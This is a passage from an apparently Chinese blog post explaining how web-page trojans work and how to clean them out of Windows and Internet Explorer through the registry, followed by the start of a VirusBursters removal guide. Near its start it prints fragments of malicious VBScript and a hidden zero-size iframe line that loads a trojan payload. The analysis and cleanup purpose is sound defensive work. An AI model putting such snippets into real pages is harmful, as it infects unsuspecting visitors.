容錯語句,避免程序崩潰<br />set aa=CreateObject("WScript.Shell")·建立WScript對象<br />Set fs = CreateObject("Scripting.FileSystemObject")·建立文件系統對象<br />Set dir1 = fs.GetSpecialFolder(0)·得到Windows路徑<br />Set dir2 = fs.GetSpecialFolder(1)·得到System路徑<br />……省略……<br />下面代碼該做什?各位都該清楚吧.這就是?什?很多人中毒後不能準确的清除全部的病毒體的原因,也是很多殺毒軟件的一個通病。病毒監控隻殺當時查到的,新建的卻置之不理。<br /><br /><br />Ⅲ. iframe 漏洞的利用<br />一<br /><br /><br />多方便的辦法,?覽者的COOKIES就這樣輕松的被取走。<br /><br />二<br /><br />〈iframe src=run.eml width=0 height=0〉〈/iframe〉<br />常見的木馬運用格式,高度和寬度?0的一個框架網頁,我想你根本看不到它。除非你的?覽器不支持框架!<br /><br />三<br /><br /><br />又是一個框架引用的新方式,對type="text/x-scriptlet" 的調整後,就可以實現和eml格式文件同樣的效果,更是防不勝防。<br /><br /><br /><br />Ⅳ. Microsoft Internet Explorer?覽器彈出窗口Object類型驗證漏洞 漏洞的利用<br />精華代碼:<br /><br />----- code cut start for run.asp -----<br /><br /><br /><br />----- code cut end for run.asp -----<br />[作者注] 我想,這個方法是現行的大部分木馬網頁中使用的頻率最高的一個。效果絕對是最好的。不管是你IE5.0還是IE6.0還是+SP1補丁的。我們都敢大聲的說:IE6.0+SP1也不是萬能的。呵呵,是不是想改用mozilla了?<br /><br /><br />總結:<br />幾乎所有類型的網頁病毒都有一個特性,就是再生,如何再生,讓我們從注冊表中的?動項開始分析:注冊表中管理?動的主鍵鍵值分??:<br />[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]<br />[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]<br />[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]<br />[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]<br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]<br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]<br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]<br />确認主鍵下沒有加載任何分鍵值.另外,在?動配置器裏的autoexec.bat ,win.ini,system.ini以及在WIN 9X下的winstart.ini文件,其中的存在LOAD=鍵的,它的值是空,不是空格,隻有=?。Autoexec.bat沒有加載任何程序,在「開始」菜單\程序\?動 文件夾下不存在任何程序,那樣才能有效的去掉一個病毒的再生功能。不叫它開機運行,或者不在運行,那我們就可以把它從計算機上請出去。<br /><br /><br /><br />第三節 網頁病毒、網頁木馬的運行效果分析<br /><br />第一、電腦中的默認主頁會被無故更改,并且IE工具欄?的修改功能被屏蔽掉;<br />第二、在電腦桌面上無故出現陌生網站的鏈接,無論怎??除,每次開機都依舊會出現,如果單擊鼠?右鍵,出現的工具欄中有也會有大量陌生網站的鏈接;<br />第三、開機後,無法進入DOS實模式; 僅對WIN 9X 系統<br />第四、電腦桌面及桌面上的圖?被?藏;<br />第五、注冊表編輯器被告知“已鎖定”,從而無法修改注冊表;<br />第六、上網之前,系統一切正常,下網之後系統就會出現異常情況,如系統盤?失、硬盤遭到格式化等,查殺病毒後仍無濟于事;<br />第七、上陌生網站後,出現提示框“您已經被XX病毒攻擊”,之後系統出現異常;<br />第八、登陸站點後,發現一個窗口迅速打開後又消失,自己的計算機系統文件夾?多了幾個未知的好象是系統文件的新文件。<br />第九、發現系統的進程中多了幾個未知進程,而且殺不掉,重起後又會出現。<br />第十、自己的計算機CPU利用率一直是高居100%,好象是在運行什?占用?存的東西。<br />第十一、登陸某站點後,殺毒監控軟件報警,并?除病毒文件,位置在IE的緩沖區。重新?動計算機後發現自己的IE被改掉了。而且發現第八,第九,第十中的現象。<br />第十二、發現中毒後,反複殺毒,病毒反複複發,根本沒辦法清理幹淨。尤其是IE的默認頁。殺毒後修複完畢,但重新?動後又出現問題。<br />第十三、會不定時的彈出廣告。<br />第十四、自己的私有帳?無故?失。<br /><br /><br /><br /><br /><br /><br />第三章 網頁病毒、網頁木馬的基本預防手段<br /><br /><br />l 要避免被網頁惡意代碼感染,首先關鍵是不要輕易去一些自己并不十分知曉的站點,尤其是一些看上去非常美麗誘人的網址更不要輕易進入,否則往往不經易間就會誤入網頁代碼的圈套。<br />l 由于該類網頁是含有有害代碼的ActiveX網頁文件,因此在IE設置中?ActiveX插件和控件、Java腳本等全部禁止就可以避免中招。<br /> 具體方法是:在IE窗口中點擊"工具→Internet選項,在彈出的對話框中選擇"安全"?簽,再點擊"自定義級?"按鈕,就會彈出"安全設置"對話框,把其中所有ActiveX插件和控件以及Java相關全部選擇"禁用"即可。不過,這樣做在以後的網頁?覽過程中可能會造成一些正常使用ActiveX的網站無法?覽。<br />l 對于Windows98用戶,請打開 C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP, 把其中的“ActiveXComponent.class”?掉;對于WindowsMe用戶,請打開C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP, 把其中的"ActiveXComponent.class"?掉。請放心,?除這個組件不會影響到你正常?覽網頁的.<br />l 對Win2000用戶,還可以通過在Win2000下把服務裏面的遠程注冊表操作服務"Remote Registry Service"禁用,來對付該類網頁。具體方法是:點擊"管理工具→服務→Remote Registry Service(允許遠程注冊表操作)",?這一項禁用即可。<br />l 升級你的IE?6.0版本并裝上所有的SP以及追加的幾個小補丁,可以有效防範上面這些症狀。<br />l 下載微軟最新的Microsoft Windows Script 5.6<br />l 安裝病毒防火牆,一般的殺毒軟件都自帶.打開網頁監控和腳本監控.<br />l 雖然經過上述的工作修改回了?題和默認連接首頁,但如果以後某一天又一不小心進入這類網站就又得要麻煩了。這時你可以在IE?覽器中做一些設置以使之永遠不能進入這類站點:<br />打開IE屬性,點擊“工具”→ “Internet選項 ”→“安全”→“受限站點”,一定要?“安全級?”定?“高”,再點擊“站點”,在“?Web站點添加到區域中”添加自己不想去的網站網址,再點擊“添加”,然後點擊“應用”和“确定”即可正常?覽網頁了。<br />l 在注冊表<br />[HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatiblity]下?<br />[Active Setup controls]創建一個基于CLSID的新建{6E449683-C509-11CF-AAFA-00AA00 B6015C}在新建下創建REGDWORD類型的值:[Compatibility Flags 0x00000400]<br />可以間接的防止網頁木馬問題。<br />l 請經常升級你的殺毒軟件病毒庫,讓他們能及時的查出藏在你計算機?的病毒殘體。經常性的做全機的掃描檢查。<br />l 推薦安裝:IE6.0.2800.1106 + SP1 + 4個IE專項補丁<br /><br /><br /><br /><br /><br />第四章 網頁病毒、網頁木馬的清理和手工清理<br /><br /><br />第一節 網頁病毒、網頁木馬的一般清理<br /><br />在病毒防治和查殺的第一選擇,我們首當其沖的就是殺毒軟件。不定期的升級你的病毒庫,關注你所用的操作系統和?覽器的漏洞信息以及相關補丁的安裝。當你進入一個惡意站點後注冊表被改時,首先要做的不是盲目的去找殺毒工具,而是确認一下你自己所中的毒是否隻是簡單的修改注冊表,如果是木馬的話,你還在網絡上飛來飛去,想想能不?東西??這就是?什?在文章的開頭部分我們花了一部分篇幅進行惡意網頁機理的介紹和說明。?的就是叫大家從道理上明白,所謂的惡意網頁是通過什?樣的途徑,運行了什?樣的代碼執行出了什?樣的效果。當然,你沒必要去理解代碼的全部含義,至少在查看一個頁面原碼時發現它,也知道它是做什?,而不去訪問此頁。再提一點,這樣做并非是讓每人個人都去理解,去記憶。在這裏我們也采用“讓少數人先富起來的”政策。這樣,那些GG才能在MM面前顯示自己的“才能”。開個玩笑,轉入整題,如何一般性的清理病毒?<br />1.到“網上助手”去清理. 地址是:http://magic.3721.com<br />2.使用殺毒軟件殺毒. 用你自己的殺毒軟件來清除。記得要先升級。<br />3.使用一些專殺工具查殺. 到一些殺毒軟件站點去下載殺毒工具吧。<br />4.到本站的專業IE維護,是針對現在幾個流行的網頁病毒,網頁木馬站點修改注冊表鍵值精心制作的.地址是:http://ie.e3i5.net<br />[作者注]請在使用網頁IE修複時,最好進行兩次修複,我們的修複器采用的是_Dll插件+Javascript+ActiveX制作的,對系統的鍵值有檢測功能,如果你的注冊表項沒有更改,修複系統會自動退出。<br /><br /><br />第二節 網頁病毒、網頁木馬的一般手工清理<br /><br />一般在網絡不通或者不能上網的情況,你可能會需要修改回你的注冊表。這時以上的方法可能幫不上你任何的忙,怎?辦?嘗試我們推薦的辦法,手工清理。<br /><br />1.清除每次開機時自動彈出的網頁<br />其實清除每次開機時自動彈出的網頁方法并不難,隻要你記住地址欄裏出現的網址,然後打開注冊表編輯器(方法是在點擊“開始”菜單,之後點擊“運行”,在運行框中輸入regedit命令進入注冊表編輯器),分?定位到:<br /><br /> HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run和<br />HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce下,看看在該子項下是否有一個以這個網址?值的值項,如果有的話,就?其?除,之後重新?動計算機。這樣在下一次開機的時候就不再會有網頁彈出來了。不過網頁惡意代碼的編寫者有時也是非常的狡猾,他會在注冊表的不同鍵值中多處設有這個值項,這樣上面提的方法也未必能完全解決問題。遇到這種情況,你可以在注冊表編輯器的選項菜單裏選擇“編輯”→“查找”,在“查找”對話框?輸入開機時自動打開的網址,然後點擊“查找下一個”,?查找到的值項?除。另外,如果你是使用Windows 98的用戶,可在“開始”菜單中的“運行”對話框?輸入“msconfig”,點擊确定,打開“系統配置實用程序”并打開“?動”選項卡,檢查其中是否有非常可疑的?動項,如果有的話請?其禁用(在程序前的打上勾),然後重?機器就可以了。如果你所使用的是Windows NT/2000的用戶,可以把Windows 98下的“系統配置實用程序”複制過來并運行進行查找清除。<br /><br /><br />2. IE?題欄被修改<br />具體說來受到更改的注冊表項目?:<br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title<br /> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title<br /><br /> 解決辦法:<br /> ?在Windows?動後,點擊“開始”→“運行”菜單項,在“打開”欄中鍵入regedit,然後按“确定”鍵;<br /> ?展開注冊表到<br />HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Window Title” ,?該串值?除即可,或?Window Title的鍵值改?“IE?覽器”等你喜歡的名字;<br /> ?同理,展開注冊表到<br />HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main<br /> 然後按?中所述方法處理。<br /> ?退出注冊表編輯器,重新?動計算機,運行IE,你會發現困擾你的問題被解決了!<br /><br />3. IE分級審查密碼的清除<br />1.打開“開始”菜單,單擊“運行”,在運行框中輸入regedit命令(這是打開注冊表編輯表的命令)。<br /> 2.在注冊表編輯器中有五個主要的鍵值,請您按照下面順序一步一步打開下面的文件(在所指的文件夾上雙擊或單擊在文件夾前面的十字符?)。<br /> 3.具體順序是:<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion<br />\Policies\Ratings<br /> 在您打到Ratings文件夾後會看到在右面的窗口中有key鍵值,直接在這個鍵上點右鍵,之後選?除,然後關閉注冊表編輯器即可。<br /> 下面的這個圖是最後一個文件夾及其右面的提示,隻要?上面顯示的key鍵?除也就可以清除IE分級審查的密碼了。如圖:<br /><br /><br />4. 篡改IE的默認頁<br />具體說就是以下注冊表項被修改:<br />HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL<br /> “Default_Page_URL”這個子鍵的鍵值即起始頁的默認頁。<br /> 解決辦法:<br /> 運行注冊表編輯器,然後展開上述子鍵,?“Default_Page_URL”子鍵的鍵值中的那些篡改網站的網址改掉就行了,或者?其設置?IE的默認值。<br /><br />5. 修複被鎖定的注冊表<br />可以自己動手制作一個解除注冊表鎖定的工具,就是用記事本編輯一個任意名字的.reg文件,比如recover.reg,?容如下:<br />窗體頂端<br /> REGEDIT4<br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]<br />"DisableRegistryTools"=dword:00000000<br />窗體底端<br /> 要特?注意的是:如果你用這個方法制作解除注冊表鎖定的工具,一定要嚴格按照上面的書寫格式進行,不能遺漏更不能修改(其實你隻需?上述?容“複制”、“粘貼”到你機器記事本中即可);完成上述工作後,點擊記事本的文件菜單中的“另存?”項,文件名可以?意,但文件擴展名必須?.reg(切記),然後點擊“保存”。這樣一個注冊表解鎖工具就制作完成了,之後你隻須雙擊生成的工具圖?,其會提示你是否?這個信息添加進注冊表,你要點擊“是”,?後系統提示信息已成功輸入注冊表,再點擊“确定”即可?注冊表解鎖了。<br /><br /><br />6. 修改IE?覽器缺省主頁,并且鎖定設置項,禁止用戶更改<br />主要是修改了注冊表中IE設置的下面這些鍵值(DWORD值?1時?不可選):<br /><br /> HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel<br /> "Settings"=dword:1<br />HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel<br /> "Links"=dword:1<br />HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel<br /> "SecAddSites"=dword:1<br /> 解決辦法:上面這些DWORD值改?“0”即可恢複功能。<br /><br /><br />7. IE的默認首頁灰色按扭不可選<br /> 這是由于注冊表HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel<br /> 下的DWORD值“homepage”的鍵值被修改的緣故。原來的鍵值?“0”,被修改後?“1”(即?灰色不可選狀?)。<br /> 解決辦法:?“homepage”的鍵值改?“0”即可。<br /><br /><br />8. IE右鍵菜單被修改<br />受到修改的注冊表項目?:<br />HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt<br />下被新建了網頁的廣告信息,并由此在IE右鍵菜單中出現!<br /> 解決辦法:<br /> 打開注冊?編輯器,找到<br /> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt<br /> ?除相關的廣告條文即可,注意不要把下載軟件FlashGet和Netants也?除掉,這兩個可是“正常”的,除非你不想在IE的右鍵菜單中見到它們。<br /><br /><br />9. IE默認搜索引擎被修改<br />出現這種現象的原因是以下注冊表被修改:<br />HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch<br />HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant<br /> 解決辦法:<br /> 運行注冊表編輯器,依次展開上述子鍵,?“CustomizeSearch”和“SearchAssistant”的鍵值改?某個搜索引擎的網址即可<br /><br /><br />10. 查看“源文件”菜單被禁用<br />惡意網頁修改了注冊表,具體的位置?:<br />HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer<br />下建立子鍵“Restrictions”,然後在“Restrictions”下面建立兩個DWORD值:<br />“NoViewSource”和“NoBrowserContextMenu”,并?這兩個DWORD值賦值?“1”。<br /><br /> 在注冊表<br />HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions下,?兩個DWORD值:“NoViewSource”和“NoBrowserContextMenu”的鍵值都改?了“1”。 通過上面這些鍵值的修改就達到了在IE中使鼠?右鍵失效,使“查看”菜單中的“源文件”被禁用的目的。<br /> 解決辦法:<br /> ?以下?容另存?後綴名?.reg的注冊表文件,比如說unlock.reg,雙擊unlock.reg導入注冊表,不用重?電腦,重新運行IE就會發現IE的功能恢複正常了。<br /> REGEDIT4<br /> HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions<br /> “NoViewSource”=dword:00000000<br /> "NoBrowserContextMenu"=dword:00000000<br /> HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions<br /> “NoViewSource”=dword:00000000<br /> “NoBrowserContextMenu”=dword:00000000<br /><br /><br />11. 系統?動時彈出對話框<br />受到更改的注冊表項目?:<br />HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon<br />在其下被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”,其中“LegalNoticeCaption”是提示框的?題,“LegalNoticeText”是提示框的文本?容。由于它們的存在,就使得我們每次登陸到Windwos桌面前都出現一個提示窗口,顯示那些網頁的廣告信息!<br /> 解決辦法:<br /> 打開注冊表編輯器,找到<br /> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon<br /> 這一個主鍵,然後在右邊窗口中找到“LegalNoticeCaption”和“LegalNoticeText”這兩個字符串,?除這兩個字符串就可以解決在登陸時出現提示框的現象了。<br /><br /><br />12. IE默認連接首頁被修改<br />受到更改的注冊表項目?:<br />HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page<br />HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page<br /> 通過修改“Start Page”的鍵值,來達到修改?覽者IE默認連接首頁的目的,如?覽“萬花谷”就會?你的IE默認連接首頁修改?“http://url.url.com ”,即便是出于給自己的主頁做廣告的目的,也顯得太霸道了一些,這也是這類網頁惹人厭惡的原因。<br /> 解決辦法:<br /> ?在Windows?動後,點擊“開始”→“運行”菜單項,在“打開”欄中鍵入regedit,然後按“确定”鍵;<br /> ?展開注冊表到<br />HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Start Page”雙擊 ,?Start Page的鍵值改?“about:blank”即可;<br /> ?同理,展開注冊表到<br />HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main<br /> 在右半部分窗口中找到串值“Start Page”,然後按?中所述方法處理。<br /> ?退出注冊表編輯器,重新?動計算機,一切OK了!<br /> 特殊例子:當IE的起始頁變成了某些網址後,就算你通過選項設置修改好了,重?以後又會變成他們的網址啦,十分的難纏。其實他們是在你機器裏加了一個自運行程序,它會在系統?動時?你的IE起始頁設成他們的網站。<br /> 解決辦法:運行注冊表編輯器regedit.exe,然後依次展開<br />HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run<br /> 主鍵,然後?其下的registry.exe子鍵?除,然後?除自運行程序c:\Program Files\registry.exe,最後從IE選項中重新設置起始頁。<br /><br /><br /><br />13. IE中鼠?右鍵失效<br />解決辦法:<br />1.右鍵菜單被修改。打開注冊表編輯器,找到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt,?除相關的廣告條文。<br />2.右鍵功能失效。打開注冊表編輯器,展開到<br />HKEY_CURRENT_USER\Software\Policies\Microsoft\<br />Internet Explorer\Restrictions,?其DWORD值"NoBrowserContextMenu"的值改?0。<br /><br /><br /><br /><br />第三節 未知網頁病毒、網頁木馬的高級手工清理<br /><br />我想,文章到這裏應該算是高潮了吧,我們所遇到任何棘手的病毒都是未知的。也正式殺毒軟件管不了的,也沒有專殺工具的幹涉,一般的IE修複也是無能?力,那怎?辦?隻有靠自己動手?病毒或木馬請出你的計算機。動手前還是要做一件事。就是确認一下,你是不是真的染毒了,如果是類QQ病毒那樣的有明顯的征兆的你當然可以直接進行以下的操作,如果沒呢?就要養成一個謹慎的?度。當發現你的計算機速度這幾天突然速度很慢,你的文件夾或是文件多出幾個,進程裏無緣無故的多出幾個新的進程文件,計算機CPU利用率總是高居不下,一打開某種類型的文件就出錯,或者是無故的死機、藍屏,那?你該注意了,你的愛機可能已經中毒了。開始你的手工查殺工作吧。(這時最好是先用升級後殺毒軟件查一次,如果沒有任何發現,再進行以下操作)。<br />情況一,你是明确知道你的計算機已經中毒了,比如說是QQ上出現自動發出信息的問題。但你發現你所發的網址并非是以前文章上介紹過的地址,那?這個站點感染的病毒可能是另外一種植入方式,如加載的文件不同,?動方式也不同等等。既然已經中毒了,那就不怕什?了,再次深入虎穴吧。但我們沒必要那樣做,我們某種意義上的深入虎穴,?的是得到這個站點網頁的病毒原碼,如何得到,我想不用我說也大家也清楚。現在很多站點都提供原代碼查看的網頁,用它就可以完全實現不用訪問該頁而提取到原碼(不要太天真哦,用這個辦法那個頁面也會到你IE緩存?,但你不必PaPa,這個不會對你夠成任何威脅).如果實在找不到,那你可以到http://www.e3i5.com/bbs/ 找我,我給你臨時做一個查看頁。(什??找不到怎?辦?那就沒辦法了,你就真的再次深入虎穴,用工具欄上的查看選項去看原碼吧。呵呵~ ^_^!)?什?要查原碼,主要是看一下,網頁的運行機制是怎?樣的?又回到我們文章一開始的話題了,?什?要花些文章在介紹網頁病毒、網頁木馬的常識和運行機理上。學以必用的道理大家比我還清楚。分析出網頁病毒、木馬的機理我們再來進行本地機的清理工具?是一個很好的前提條件。<br /><br />情況二,你根本不知道你是不是中毒了,怎?辦?要從計算機最基本的開始查,進程表。這個一般是查出問題的關鍵之處。一般都要使用第三方軟件來查看,如 windows優化大師的進程管理器,柳葉擦眼等。查看進程表,那些?識?系統文件的進程你可以不看,而那些非系統進程你要注意了。象一些仿系統文件的進程則是我們重點關心的對象,發現即禁止掉,然後到相應的路徑改名。(由于是非系統進程,終止掉它到下次重新?動也不會影響計算機的正常運行)然後,查看該文件的屬性,尤其是查看“創建時間”如果和你的中毒時間相仿或是差不多遠,那就說明這個文件十之八九就?病毒文件。一般的系統文件創建時間都是很早哦,大約要比當前時間早一到兩年,甚至三年五年的。按如此辦法我們就可以逐一的找出可疑的文件,然後按以下的方法進行病毒的清理。<br /><br /><br />清理工作的開始:<br />?準備工作:<br />下載進程管理軟件:柳葉擦眼 沒有的請到以下地址下載:<br />http://www.e3i5.com/soft/SoftView.Asp?SoftID=361<br />這裏我推薦使用 柳葉擦眼 因?它是個綠色軟件,不需要安裝,下載解壓後該怎?用就怎?用,方便。<br />進行手工殺毒的準備工作,先關閉你能關閉的所有軟件,包括殺毒軟件,防火牆,寬帶連接等等一切能生成進程的東西.隻保留必要的系統進程,這樣會使以後的操作帶來很多方便。<br />?查看系統進程:除了顯示系統文件外,?所有無關的進程殺掉。<br />如:查看進程表定位文件。intneter.exe c:\windows\system\intneter.exe 這裏的intneter.exe就是仿intnater.exe輸入法進程加載到系統的非法進程文件,我們應馬上結束這個進程,并?除對應的文件,注意一些文件是?藏的,在查找時應用"文件夾選項"打開對?藏文件的查看.<br /><br />如果不知道相關的進程,你可以這樣嘗試,<br />?進程軟件下載後,斷網,關閉運行的軟件,打開進程管理軟件,軟件顯示的系統進程你不要理,如果你不知道你以前正常的軟件進程名是什?的話,?所有非系統的進程全部殺死,(注意除了進程查看軟件之外的哦,我要是不說一定有人連它一起殺了.)并記下他們的文件路徑,并記錄下來。由于不知道是否是非法文件暫時改名,也記錄下來,以便修改。<br /><br />?修改注冊表<br />開始 ------ > 運行 ------ > REGEDIT ------ > 編輯 ------ > 查找<br />查找<br />[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]<br />[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]<br />[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]<br />[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]<br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]<br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]<br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]主鍵下所有的鍵都?空,如果不?空,全部清理?空.使系統?動不加載任何程序。(一般的來說,驅動程序除了一些顯示驅動會保留在?動項裏,其他重要的很少了)如果你知道你常用軟件所在RUN以及相關鍵下的值,當然更好,你就可以選擇性的進行清理。對以後的整理工作會更方便些。<br />修改以下注冊表關聯項目:<br />[HKEY_CLASSES_ROOT\ chm.file\ shell\ open\ command "(默認)" "%windir%\hh.exe" %1 ]<br />[HKEY_CLASSES_ROOT\ exefile\ shell\ open\ command "(默認)" "%1" %* ]<br />[HKEY_CLASSES_ROOT\ inifile\ shell\ open\ command "(默認)" %windir%\NOTEPAD.EXE %1 ]<br />[HKEY_CLASSES_ROOT\ regfile\ shell\ open\ command "(默認)" regedit.exe "%1" ]<br />[HKEY_CLASSES_ROOT\ scrfile\ shell\ open\ command "(默認)" "%1" /S ]<br />[HKEY_CLASSES_ROOT\ txtfile\ shell\ open\ command "(默認)" %windir%\NOTEPAD.EXE %1]<br /><br />?清理?動項配置文件<br />1.進入配置管理,除WIN 2K外都?MSCONFIG.<br />開始 ------ > 運行 ------ > MSCONFIG<br />WIN 9X用戶注意:??動配置裏所有帶*.hta,的去掉。HTA的特性就是?藏掉窗體,然後一段時間就彈出網頁.<br />進入:system.ini<br />修改[BOOT]<br />shell=Explorer.exe //注意:後面沒東西了,再有什?,改成和前面一樣的。<br />進入:WIN.INI<br />修改[WINDOWS]<br />//注意load鍵後面除了=?什?也沒有。空格都不行。<br />LOAD=<br />NULLPORT=NONE<br />修改:autoexec.bat ?容?空<br />WIN 2K 直接進入?動編輯器。<br />修改以上三個文件.<br />記得這三個文件裏沒有任何?空的指令命令,有就?除。<br />任何值如果?空的話就是什?都沒有,甚至于空格都不存在。有之,改!<br /><br />?清理注冊表垃圾信息<br />開始 ------ > 運行 ------ > REGEDIT ------ > 編輯 ------ > 查找<br />?開機運行的那個站點進行搜索找到即?除.<br /><br />?清理緩存 [這點最重要]<br />一定要把你的IE緩沖區清理幹淨,以及TEMP文件夾的臨時文件和垃圾文件清理幹淨。<br />好了,?你記錄的路徑的文件保存,然後重新?動計算機。<br />?清理校驗<br />1.?動計算機後,再次打開柳葉擦眼,查看進程,看除了系統進程是否還有其他進程存在。如果沒有,說明手工清理完成。如果還發現異常的進程請重複以上步驟。<br />2.确認殺毒完成後,你開始逐一的?動各類軟件,檢查你所改名的文件是否會影響到軟件運行,如果沒有異常發生,請?除或放入你殺毒軟件的隔離區,(?什?要選擇後者畢竟我們還不清楚這是不是病毒文件,即使是在隔離區的文件系統是不會再次運行的).<br />[注意]做這項工作時你一定要想起你在殺進程時保存的那個進程路徑列表文件,依照上面的文件逐一的進行檢查.<br />3.逐一恢複了所有的進程後,重新?動計算機,再做最後一次檢測。以防萬一。<br />4.到此?止,你已經完成了你的全部手工清理過程,病毒已經被你請出你的計算機了。<br /><br /><br /><br />總結:<br />不論怎?說,自己親自清理過一次網頁病毒後,你會覺得網頁病毒其實也并非那樣可怕,最難的是挑戰自我的勇氣。我個人并不推薦計算機出了問題就是格盤、重裝,這并非是一個解決問題的途徑。我們建議大家首先先簡單的認識惡意網頁的代碼機理?的就是從根本上來解決問題。但,我們更強調的是動手能力。當然我的意思也并非完全?棄殺毒和防毒軟件,但,畢竟是個工具。俗話講得好:事在人?。<br /><br /><br /><br />[新問題]<br />最近在寫一個特殊效果頁的時候,發現一個新問題,頁面在執行了幾個特殊函數後,整個頁面被鎖死,以下所有的JS全部失效,打開進程查看,發現有一個svchost.exe一直在監視這個頁面進程,而在WINDOWS的?準進程管理中看不到,隻有借助第三方軟件才能終止此進程,即使終止了網頁進程,這個svchost.exe的監視進程還在。與好友LuoLuo商量了一段時間後,猜測可能是由于頁面中的某部分代碼引起了緩沖區溢出,導緻IE崩潰,而不能執行頁面指令。多次測試隻後我們還是找不到原因,到底是哪部分函數引起了這個問題我們還在研究中,出現的問題就是非常非常的?蔽,如果在頁面鎖死後可以注入一些惡意代碼或是木馬那不是沒救了?IE啊…用MOZILLA算了,呵呵~<br /><br /><br /><br /><br /><br />後 記<br /><br />全文到這裏基本上結束了。通篇文章涉及到網頁病毒代碼分析,中毒機理分析,預防手段,以及一般的查殺、手工查殺 四大部分的介紹。我盡量做到詳細的?問題以最簡單易懂的方式說明。歸結到一點就是,希望大家能從網頁病毒的本質出發來面對它,解決它。仔細想想現在含各式病毒站點越來越多,而他們利用的也不僅僅是代碼的威力以及系統或是?覽器上漏洞,也上在利用大家在?覽網頁的安全意識不健全的基礎上。另外,我還想說明的一點就是:不要完全依靠殺毒軟件,現在國?的一些殺毒軟件做的并完善,殺毒不徹底,很容易殘留一些病毒遺體到你計算機?,當你一不小心運行了它,病毒又死灰複燃了;還有就是一部分殺毒軟件雖然能及時的預警,但在殺毒上卻稍遜一籌.殺掉了緩存?的病毒原體,卻留下了病毒自動生成的新文件。這也似乎成了國?軟件的一個通病,功能有,但不強大。面對?如此格局,除了自己伸手幫自己,還能有什?辦法?相信自己,遇到問題自己動手解決.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-9179363921972148964?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-48799952830253761242007-08-22T01:45:00.001-07:002007-08-22T01:45:27.471-07:00VirusBrusters移除方法VirusBursters Program<br /><br /><br /><br />If you are infected with this program you will receive warnings in your task bar stating that you are infected with spyware and to run its special anti-spyware tool. This tool turns out to be the VirusBursters or VirusBurster programs that were downloaded to your computer without your permission. These warnings are fake and are a goad to have you buy the commercial version of these software. The title for this fake security alert is Critical System Error! or Critical System Errors! and the text for these alerts can be either:<br /><br />System detected virus activities. They may cause critical system failure. Please, use AntiSpyware software to clean and protect your system from parasite programs. Click this baloon to get all available software.<br /><br />or<br /><br />System detected virus activities. They may cause critical system failure. Please, use antimalware software to clean and protect your system from parasite programs. Click this baloon to get all available software.<br /><br />Examples of these fake alerts are shown below:<br /><br /><br /><br />VirusBursters Fake alert<br /><br /><br /><br />VirusBurster Fake alert<br /><br /><br />VirusBurst or VirusBursters are a direct morph from a previous rogue anti-spyware program called VirusBurst. Though the information for this program has been changed to reflect new names, VirusBursters or VirusBurst, they have been shown to be hosted form the same locations, IP addresses, or even domains.<br /><br />Tools Needed for this fix:<br /><br /> * SmitFraudFix (Automated Fix) FixVBS 